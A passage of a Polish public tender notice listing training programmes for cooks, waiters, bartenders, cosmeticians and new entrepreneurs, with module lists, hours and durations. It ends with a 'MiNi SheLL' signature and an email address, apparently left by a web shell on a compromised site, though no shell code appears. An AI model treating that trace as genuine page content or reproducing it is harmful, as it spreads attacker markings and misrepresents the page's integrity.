9) obróbka wstępna podrobów,
10) przygotowanie surówek,
11) obróbka termiczna produktów,
12) przygotowanie sałatek,
13) przygotowanie potraw mlecznych,
14) obróbka termiczna jarzyn,
15) przygotowanie potraw z kaszy,
16) przygotowanie potraw z mąki,
17) przygotowanie potraw z jaj,
		18) sporządzanie zup i dodatków do zup
- suma godzin dla jednostek modułowych 1-18 - minimum 90 godzin
2. modułowy program szkolenia zawodowego dla zawodu: kelner, z zakresu: samodzielne wykonywanie zadań 	w sali konsumpcyjnej   (kod zawodu: 512302) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej,
2) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej,
3) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej,
4) przygotowanie poprzedzające obsługę,
5) przygotowanie sali konsumenckiej,
6) obsługiwanie w sali konsumenckiej,
7) noszenie zastawy,
8) serwowanie potraw,
9) wydawanie śniadań,
10) przygotowanie potraw w obecności konsumenta,
11) serwowanie napojów bezalkoholowych zimnych i gorących,
12) serwowanie napojów alkoholowych,
13) organizacja przyjęć okolicznościowych,
14) obsługa gości hotelowych przez kelnera,
15) wystawianie rachunków
- suma godzin dla jednostek modułowych 1-15 - minimum 40 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                               z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
3. jednostkę modułową: obsługa kasy fiskalnej oraz programu komputerowego do obsługi punktu  
	gastronomicznego- minimum  20 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
5. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum 30 	godzin.
6. jednostkę modułową: nowoczesne techniki sprzedaży- 10 godzin.
Dodatkowe wymagania: Wykonawca zapewni uczestnikowi szkolenia odzież ochronną (roboczą) oraz zakupi minimum 2 książki, których tematyka zgodna będzie z zakresami szkolenia (kucharz, kelner)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 48.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zakres  V: Kelner-barman -1 osoba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni.
Program szkolenia:  minimalna ilość godzin - 200, w tym minimum 150 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kelner, z zakresu: samodzielne wykonywanie zadań 	w sali konsumpcyjnej   (kod zawodu: 512302) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej,
2) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej,
3) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej,
4) przygotowanie poprzedzające obsługę,
5) przygotowanie sali konsumenckiej,
6) obsługiwanie w sali konsumenckiej,
7) noszenie zastawy,
8) serwowanie potraw,
9) wydawanie śniadań,
10) przygotowanie potraw w obecności konsumenta,
11) serwowanie napojów bezalkoholowych zimnych i gorących,
12) serwowanie napojów alkoholowych,
13) organizacja przyjęć okolicznościowych,
14) obsługa gości hotelowych przez kelnera,
15) wystawianie rachunków
- suma godzin dla jednostek modułowych 1-15 - minimum  60 godzin
2. modułowy program szkolenia zawodowego dla zawodu: bufetowy (barman) z zakresu: samodzielne 	wykonywanie zadań w bufecie  (kod zawodu: 512301) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w bufecie,
2) przygotowanie bufetu do pracy,
3) przygotowanie bufetu  do obsługi,
4) sporządzanie kart menu,
5) sporządzanie deserów lodowych i owocowych,
6) sporządzanie wybranych dań garmażeryjnych i barowych,
7) przygotowanie coctaili,
8) obsługa konsumenta przy bufecie,
9) komunikowanie się z konsumentami,
10) planowanie i rolizczanie bufetu,
11) kalkulowanie cen i rozliczenie finansowe bufetu,
12) zapewnienie jakości usług
- suma godzin dla jednostek modułowych 1-12 - minimum  55 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                               z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
3. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
4. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,

5. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum                	50 godzin,
6. jednostkę modułową: zagadnienia z zakresu zawodu sommelier- minimum 15 godzin.
Dodatkowe wymagania: Wykonawca zapewni uczestnikowi szkolenia odzież ochronną (roboczą) oraz zakupi  książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 36.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakres  VI: Kelner-barman  z elementami pomocy kuchennej - 5 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 11 tygodni.
Program szkolenia:  minimalna ilość godzin - 400, w tym minimum 300 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kelner, z zakresu: samodzielne wykonywanie zadań 	w sali konsumpcyjnej   (kod zawodu: 512302) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej,
2) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej,
3) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej,
4) przygotowanie poprzedzające obsługę,
5) przygotowanie sali konsumenckiej,
6) obsługiwanie w sali konsumenckiej,
7) noszenie zastawy,
8) serwowanie potraw,
9) wydawanie śniadań,
10) przygotowanie potraw w obecności konsumenta,
11) serwowanie napojów bezalkoholowych zimnych i gorących,
12) serwowanie napojów alkoholowych,
13) organizacja przyjęć okolicznościowych,
14) obsługa gości hotelowych przez kelnera,
15) wystawianie rachunków
- suma godzin dla jednostek modułowych 1-15 - minimum 100 godzin
2. modułowy program szkolenia zawodowego dla zawodu: bufetowy (barman) z zakresu: samodzielne 	wykonywanie zadań w bufecie  (kod zawodu: 512301) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w bufecie,
2) przygotowanie bufetu do pracy,
3) przygotowanie bufetu  do obsługi,
4) sporządzanie kart menu,
5) sporządzanie deserów lodowych i owocowych,
6) sporządzanie wybranych dań garmażeryjnych i barowych,
7) przygotowanie coctaili,
8) obsługa konsumenta przy bufecie,
9) komunikowanie się z konsumentami,
10) planowanie i rolizczanie bufetu,
11) kalkulowanie cen i rozliczenie finansowe bufetu,
12) zapewnienie jakości usług
- suma godzin dla jednostek modułowych 1-12 - minimum 100 godzin
1. modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: wykonywanie zadań w kuchni pod nadzorem kucharza (512201) z następującymi jednostkami modułowymi:
1) przygotowanie stanowiska pracy zgodnie z wymogami,
2) czynności porządkowe w kuchni,
3) przechowywanie surowców i przygotowanie do obróbki wstępnej,
4) obróbka wstępna jaj,
5) obróbka wstępna ryb,
6) obróbka wstępna jarzyn,
7) obróbka wstępna drobiu i dzikiego ptactwa,
8) obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny,
9) obróbka wstępna podrobów,
10) przygotowanie surówek,
11) obróbka termiczna produktów,
12) przygotowanie sałatek,
13) przygotowanie potraw mlecznych,
14) obróbka termiczna jarzyn,
15) przygotowanie potraw z kaszy,
16) przygotowanie potraw z mąki,
17) przygotowanie potraw z jaj,
18) sporządzanie zup i dodatków do zup
- suma godzin dla jednostek modułowych 1-18 - minimum 100 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                               z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
4. jednostkę modułową: obsługa kasy fiskalnej oraz programu komputerowego do obsługi punktu  	gastronomicznego - minimum  25 godzin,
5.  jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
6. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum                	50 godzin,
7. jednostkę modułową: zagadnienia z zakresu zawodu sommelier- minimum 15 godzin.
Dodatkowe wymagania: Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą) oraz zakupi dla każdego uczestnika szkolenia minimum 2 książki, których tematyka zgodna będzie z zakresami szkolenia (kelner-barman, kucharz)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 66.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakres  VII: Kelner-barman z elementami pomocy kuchennej - 2 osoby w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 5 tygodni.
Program szkolenia:  minimalna ilość godzin - 150, w tym minimum 90 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kelner, z zakresu: samodzielne wykonywanie zadań 	w sali konsumpcyjnej   (kod zawodu: 512302) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w sali konsumenckiej,
2) wykazywanie kultury osobistej i przestrzeganie etyki zawodowej,
3) wyposażenie i obsługa sprzętu kelnerskiego w części konsumenckiej i ekspedycyjnej,
4) przygotowanie poprzedzające obsługę,
5) przygotowanie sali konsumenckiej,
6) obsługiwanie w sali konsumenckiej,
7) noszenie zastawy,
8) serwowanie potraw,
9) wydawanie śniadań,
10) przygotowanie potraw w obecności konsumenta,
11) serwowanie napojów bezalkoholowych zimnych i gorących,
12) serwowanie napojów alkoholowych,
13) organizacja przyjęć okolicznościowych,
14) obsługa gości hotelowych przez kelnera,
15) wystawianie rachunków
- suma godzin dla jednostek modułowych 1-15 - minimum 35 godzin
2. modułowy program szkolenia zawodowego dla zawodu: bufetowy (barman) z zakresu: samodzielne 	wykonywanie zadań w bufecie  (kod zawodu: 512301) z następującymi jednostkami modułowymi:
1) przestrzeganie zasad bhp, p.poż. w bufecie,
2) przygotowanie bufetu do pracy,
3) przygotowanie bufetu  do obsługi,
4) sporządzanie kart menu,
5) sporządzanie deserów lodowych i owocowych,
6) sporządzanie wybranych dań garmażeryjnych i barowych,
7) przygotowanie coctaili,
8) obsługa konsumenta przy bufecie,
9) komunikowanie się z konsumentami,
10) planowanie i rolizczanie bufetu,
11) kalkulowanie cen i rozliczenie finansowe bufetu,
12) zapewnienie jakości usług
- suma godzin dla jednostek modułowych 1-12 - minimum 35 godzin
3.  modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: wykonywanie zadań w kuchni 	pod nadzorem kucharza (512201) z następującymi jednostkami modułowymi:
1) przygotowanie stanowiska pracy zgodnie z wymogami,
2) czynności porządkowe w kuchni,
3) przechowywanie surowców i przygotowanie do obróbki wstępnej,
4) obróbka wstępna jaj,
5) obróbka wstępna ryb,
6) obróbka wstępna jarzyn,
7) obróbka wstępna drobiu i dzikiego ptactwa,
8) obróbka wstępna mięsa zwierząt rzeźnych i dziczyzny,
9) obróbka wstępna podrobów,
10) przygotowanie surówek,
11) obróbka termiczna produktów,
12) przygotowanie sałatek,
13) przygotowanie potraw mlecznych,
14) obróbka termiczna jarzyn,
15) przygotowanie potraw z kaszy,
16) przygotowanie potraw z mąki,
17) przygotowanie potraw z jaj,
18) sporządzanie zup i dodatków do zup
- suma godzin dla jednostek modułowych 1-18 - minimum 20 godzin
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                               z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
4. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin,
5. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin,
6. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum                	30 godzin,
7. jednostkę modułową: zagadnienia z zakresu zawodu sommelier- minimum 10 godzin.
Dodatkowe wymagania: Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą) oraz zakupi dla każdego uczestnika szkolenia  minimum 2 książki, których tematyka zgodna będzie z zakresami szkolenia (kelner-barman, kucharz)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zakres  VIII: Kucharz małej gastronomii - 5 osób  w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż  11 tygodni. 
Program szkolenia: minimalna ilość godzin - 400, w tym minimum  300 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w jednostce żywienia zbiorowego). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kucharz, z zakresu: samodzielne  wykonywanie zadań w kuchni (kod zawodu: 512201) z następującymi jednostkami modułowymi: 
1) obróbka termiczna mięsa,
2) sporządzanie potraw z mięsa, zwierząt rzeźnych i dziczyzny,
3) sporządzanie potraw z drobiu i dzikiego ptactwa,
4) sporządzanie potraw z ryb,
5) sporządzanie potraw z podrobów,
6) sporządzanie potraw półmięsnych i jarskich,
7) przygotowanie sosów gorących,
8) przygotowanie deserów oraz napojów zimnych i gorących,
9) przygotowanie zakąsek,
10) sporządzanie potraw dietetycznych,
11) sporządzanie potraw kuchni staropolskiej oraz kuchni innych narodów,
12) sporządzanie potraw na przyjęcia okolicznościowe i inne imprezy specjalne
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                             z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl. 
2. jednostkę modułową: obsługa kasy fiskalnej - minimum  10 godzin;
3. jednostkę modułową: podstawowe zasady higieny- minimum 10 godzin;
4  jednostkę modułową: sporządzanie kalkulacji i ustalanie cennika potraw- minimum  5 godzin;
5. jednostkę modułową: zakładanie i prowadzenie działalności gastronomicznej- minimum 15 godzin.
6. jednostkę modułową: lektorat języka angielskiego (słownictwo związane z tematem szkolenia)- minimum                	30 godzin.	
Dodatkowe wymagania: Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą) oraz zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 66.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zakres  IX: Kosmetyczka - 4 osoby w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 4 tygodnie.
Program szkolenia:  minimalna ilość godzin - 180, w tym minimum 130 godzin ćwiczeń, przy czym co najmniej 50% ćwiczeń powinno odbyć się na stanowisku pracy (w zakładzie kosmetycznym). 
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: kosmetyczka, z zakresu: wykonywanie zabiegów               	z zakresu kosmetyki pielęgnacyjnej, leczniczej i upiększającej  (kod zawodu: 514103) z następującymi 	jednostkami modułowymi:
1) pielęgnowanie dłoni, manicure;
2) pielęgnowanie stóp, pedicure;
3) farbowanie rzęs i brwi z regulacją łuku brwiowego;
4) pielęgnacja twarzy;
5) depilowanie wybranych części ciała;
6) pielęgnowanie wybranych części ciała;
7) wykonywanie zabiegów modelujących sylwetkę i redukujących defekty skóry;
8) zarządzanie w gabinecie kosmetycznym
Uwaga: Każda jednostka modułowa musi zawierać wszystkie jednostki szkoleniowe zgodnie                               z modułowym programem szkolenia dostępnym na stronie www.standardyiszkolenia.praca.gov.pl.
2.  jednostkę modułową:  stylizacja paznokci metodą żelową- minimum  25 godzin,
3.  jednostkę modułową:  stylizacja paznokci metodą akrylową- minimum 25 godzin,
4. jednostkę modułową:  zdobnictwo paznokci, w tym: nakładanie tipsów, malowanie paznokci- minimum 28 	godzin
Dodatkowe wymagania: Wykonawca dla każdego uczestnika szkolenia zapewni odzież ochronną (roboczą) oraz zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 24.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zakres X: Podstawy przedsiębiorczości -10 osób w I edycji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 3 tygodnie
Program szkolenia:  minimalna ilość godzin - 100, w tym minimum  60 godzin ćwiczeń. Program szkolenia musi zawierać następujące jednostki modułowe:
1. czynności związane z rozpoczęciem działalności gospodarczej- minimum  10 godzin, 
2. tworzenie biznes planu - minimum  5 godzin, 
3. zasady ubezpieczenia w ZUS-ie - minimum 10 godzin,
4. promocja i marketing - minimum  10 godzin, 
5. aspekty prawne prowadzenia działalności gospodarczej i prawo pracy - minimum  10 godzin,
6. dodatkowe źródła finansowania działalności gospodarczej- minimum  10 godzin,
7. prawo podatkowe wraz z windykacją należności- minimum  5 godzin,
8. elementy kadr i płac- minimum 12 godzin,
9. księgowość mikro i małych firm- minimum 10 godzin,
10.obsługa komputera (edytor tekstów, arkusz kalkulacyjny, system obsługi baz danych, program do 	prezentacji multimedialnych, poczta elektroniczna, obsługa Internetu) - minimum 18 godzin.
Dodatkowe wymagania: Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie z zakresem szkolenia. 
UWAGA! Podane ilości godzin szkolenia oznaczają godziny zegarowe! Godzina zegarowa kursu liczy 60      minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut. Długość przerw może być ustalana w sposób elastyczny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 18.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com